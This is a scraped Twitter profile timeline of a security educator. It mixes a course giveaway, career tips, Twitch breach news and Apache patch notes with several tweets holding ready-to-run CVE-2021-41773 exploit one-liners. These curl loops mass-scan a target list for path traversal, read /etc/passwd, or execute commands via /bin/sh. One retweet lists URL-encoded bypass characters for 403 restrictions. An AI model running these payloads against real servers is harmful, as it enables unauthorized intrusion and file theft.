Rohit Gautam   

@HackerGautam

Founder I talk and teach building constructive capacity/workforce in cyber security.

Open Source Community
learn.hacktify.in
Joined August 2012
125 Photos and videos Photos and videos

Tweets

You blocked @HackerGautam

Are you sure you want to view these Tweets? Viewing Tweets won't unblock @HackerGautam

  1. Pinned Tweet
    11 hours ago

    Hello Everyone, We are giving away 50 courses 🔥🎉💯😱 ✅Rules: Follow 👇 ✅Apply : ✅Retweet ➡️ Results : 20 Oct 2021

    7 replies 47 retweets 53 likes
    Undo
  2. 13 hours ago

    CVE-2021-41773 🧵👇 1.Apache 2.4.48 and earlier ✅ 2.Apache 2.4.50 ✅ 3. Apache 2.4.49 + Require all denied ✅ 4.Apache 2.4.49 + Require all denied comment-out = Path traversal 🔥 5.Apache 2.4.49 + Require all denied comment-out + mod_cgi enabled = RCE🔥🔥

    9 retweets 37 likes
    Undo
  3. 14 hours ago

    Thats useful and sweet ✅

    Alhamdullilah, I was awarded 4x$ bounty. Single API call could leak 1MILLION+ users private data I use these %03 %08 %10 %83 etc when I get 403 along with "403 in Api response". means we are beyond WAF but some regex/restrictions/auth-checks are stopping us to get Users data.
    5 likes
    Undo
  4. 14 hours ago

    Simple and effective. ✅

    If you want to be successful at pentesting/bbounty. Develop a methodology around the downfalls of a common vulnerability assessment to show your worth. Many companies you may encounter use vuln scanners and implement SAST/DAST. Target things these can't find and you'll crush it.
    1 retweet 4 likes
    Undo
  5. 15 hours ago

    Questions. No Questions are stupid, lame or funny. Ask them, It might help out alot of others but be respectful. 💯❤️

    1 reply 1 retweet 18 likes
    Undo
  6. 15 hours ago

    So I just phrased this. Communication is the key. Express yourself.🤗 Communicate well in the community and make your comments commute better to every person coming in your way completely. ❤️💯

    1 reply 2 retweets 30 likes
    Undo
  7. 15 hours ago

    Disagree. Nice people become coders. Nicer people to understand the code and find flaws into it become hackers😇

    Nice people become coders, angry people become hackers.
    1 reply 22 likes
    Undo
  8. 16 hours ago

    Twitch source code and financial data was leaked on 4chan today. Someone on 4chan said Twitch is Open source now. ➡️ What you can do? ✅ Change Passwords ✅ Apply MFA ✅ Retweet this.

    1 reply 36 retweets 81 likes
    Undo
  9. 17 hours ago

    Update: CVE-2021-4177🔥 ➡️Apache 2.4.49 Path Traverse / RCE ✅Use: /icons instead of just /cgi-bin Seeing this activity already in wild.

    4 replies 7 retweets 59 likes
    Undo
  10. 18 hours ago

    Twitch (owned by Amazon) has allegedly been hacked and data leaked. I mean a lot of things already happened this week please.

    UPDATE: One anonymous company source told VGC that the leaked Twitch data is legitimate, including the source code. Internally, Twitch is aware of the breach, the source said, and it’s believed that the data was obtained as recently as Monday.
    Show this thread
    2 replies 2 retweets 10 likes
    Undo
  11. 23 hours ago

    Update : CVE-2021-41773 POC as RCE 🔥👇💥 ✅One Liner: cat file | while read host do ; do curl --silent --path-as-is --data "echo;id" '$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' | grep "uid" && echo "$host \033[0;31mVuln\n"|| echo "$host \033[0;32mNot\n";done

    9 replies 92 retweets 305 likes
    Undo
  12. Oct 5

    The Bluetooth Chappals. Now this is the best use of Web 3.0 🔥

    10 likes
    Undo
  13. Oct 5

    This Payload also works. localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd

    CVE-2021-41773 POC 🔥👇 ✅ One Liner : cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
    Show this thread
    1 reply 8 retweets 36 likes
    Undo
  14. Oct 5

    Taking some constructive feedbacks for an organisation. If we started a bug bounty program💰. What are something you would suggest?

    8 replies 6 retweets 25 likes
    Undo
  15. Oct 5

    1 retweet 3 likes
    Show this thread
    Show this thread
    Undo
  16. Oct 5

    ✅Want to know what BGP is? ✅Read more about BGP Hijacking.

    1 reply 27 retweets 64 likes
    Show this thread
    Show this thread
    Undo
  17. Oct 5

    Reading Time 🎉👇 Increasing Cloud Security Risks! → Link :

    5 retweets 20 likes
    Undo
  18. Oct 5

    ✅Patch Available : Update to Apache 2.4.50

    2 retweets 18 likes
    Show this thread
    Show this thread
    Undo
  19. Oct 5

    ✅Fix: Do not hide your banner messages to avoid fingerprinting. Sigma Rule for detection -

    1 reply 4 retweets 31 likes
    Show this thread
    Show this thread
    Undo
  20. Oct 5

    ✅ Root Cause :

    1 reply 7 retweets 29 likes
    Show this thread
    Show this thread
    Undo

@HackerGautam hasn't Tweeted yet.

Loading seems to be taking a while.

Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.

    You may also like

    ·